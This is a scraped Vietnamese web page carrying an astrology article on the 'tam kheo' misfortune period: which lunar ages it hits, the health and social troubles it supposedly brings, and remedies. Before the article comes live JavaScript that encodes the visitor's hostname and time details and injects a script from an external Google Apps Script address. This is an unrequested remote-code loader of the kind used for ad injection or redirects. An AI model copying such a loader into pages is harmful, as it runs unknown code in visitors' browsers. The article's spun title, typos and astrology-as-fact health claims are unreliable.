var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Lưu ngay hạn tam kheo là hạn gì hàng đầu 2023

Người xưa có câu “Huỳnh tuyền bệnh nặng nguy vong – Tam kheo đau mắt đề phòng tay chân”. Vậy tam kheo là gì? Hạn tam kheo tốt hay xấu? Cách hóa giải hạn tam kheo như thế nào? Hãy đọc bài viết dưới đây của META.vn để hiểu rõ hơn về hạn tam kheo bạn nhé!

Tam kheo là gì?

Theo tử vi, có 8 niên hạn chiếu mệnh. Chúng luân chuyển theo từng năm, mỗi năm lại ứng với những độ tuổi khác nhau. Tam kheo là 1 trong niên hạn chiếu mệnh đó.

Hạn tam kheo là như thế nào? Tam kheo là hạn chủ về sức khỏe, nhất là những bệnh về mắt, tay chân, xương khớp. Ngoài ra, nam, nữ nếu gặp hạn tam kheo còn dễ vướng vào tai tiếng, thị phi, phải chịu áp lực lớn về mặt tâm lý.

Hạn tam kheo tốt hay xấu?

Đến đây chắc hẳn nhiều bạn cũng đoán được hạn tam kheo là tốt hay xấu rồi đúng không? Theo tử vi, hạn tam kheo là một hạn xấu, trong đó:

 • Hạn tam kheo với sức khỏe: Người bị hạn tam kheo dễ mắc các bệnh về xương khớp tay chân, nhẹ thì đau nhức xương khớp, nặng thì gãy chân, gãy tay, tàn tật… Khi tham gia giao thông có thể xảy ra tai nạn.
 • Hạn tam kheo đối với các vấn đề khác trong cuộc sống: Hạn tam kheo dễ dẫn đến các xung đột, mâu thuẫn, cãi vã, thị phi, bị người xung quanh lên án, châm biếm… từ đó gây áp lực rất lớn về mặt tâm lý.

Mặc dù tam kheo có thể gây ra nhiều mối nguy về sức khỏe và tâm lý, nhưng nó chỉ được xếp vào nhóm Tiểu Hạn. Nếu bạn gặp hạn tam kheo trùng với các năm bị hung tinh như Thái Bạch, La Hầu, Kế Đô… thì cần phải chú ý hơn.

Hạn tam kheo chủ về sức khỏe

Năm nay tuổi nào gặp hạn tam kheo?

Năm nay, nam – nữ có số tuổi như sau (tuổi theo Âm lịch) sẽ gặp hạn tam kheo:

 • Tuổi nam gặp hạn tam kheo: 11, 19, 20, 28, 37, 46, 55, 64, 73, 82, 91.
 • Tuổi nữ gặp hạn tam kheo: 13, 22, 31, 39, 40, 48, 57, 66, 75, 84, 93.

Cách hóa giải hạn tam kheo

Để giải hạn tam kheo, bạn có thể tham khảo một số cách sau đây:

Giải hạn tam kheo đối với vấn đề về sức khỏe

 • Chăm sóc tốt cho mắt, vệ sinh mắt sạch sẽ.
 • Chú ý khi tham gia giao thông để tránh hoặc hạn chế tối đa tai nạn.
 • Cần phải cẩn trọng khi làm việc, lao động, nhất là với những người làm nghề cơ khí hoặc phải leo trèo nhiều. Bạn nên sử dụng đồ bảo hộ lao động để phòng tai nạn.
 • Chú ý sức khỏe xương khớp, nhất là những người ở độ tuổi trung niên, người cao tuổi.
 • Ăn uống kheo học, thường xuyên tập thể dục thể thao.

Giải hạn tam kheo đối các vấn đề khác trong cuộc sống

 • Nên nhẫn nhịn khi có thể, hạn chế tranh cãi, xung đột.
 • Không nên đưa ra các quyết định khi nóng giận.
 • Hành thiện, làm việc có ích cho bản thân và xã hội.
 • Tìm hiểu kỹ trước khi bước vào một mối quan hệ, để tránh thị phi, phiền toái về sau.
 • Tu tâm dưỡng tính, nên đi chùa, hướng Phật để tâm tình an tĩnh, bình an.

Cách giải hạn tam kheo

Hy vọng những chia sẻ trên đây của chúng tôi đã giúp bạn hiểu được hạn tam kheo là gì, tốt hay xấu và cách hóa giải hạn tam kheo như thế nào. Đừng quên ghé thăm chuyên mục Tổng hợp trên META.vn để được chia sẻ nhiều bài viết thú vị khác bạn nhé!

META.vn – Mua Hàng Chính Hãng Online, Giá Tốt!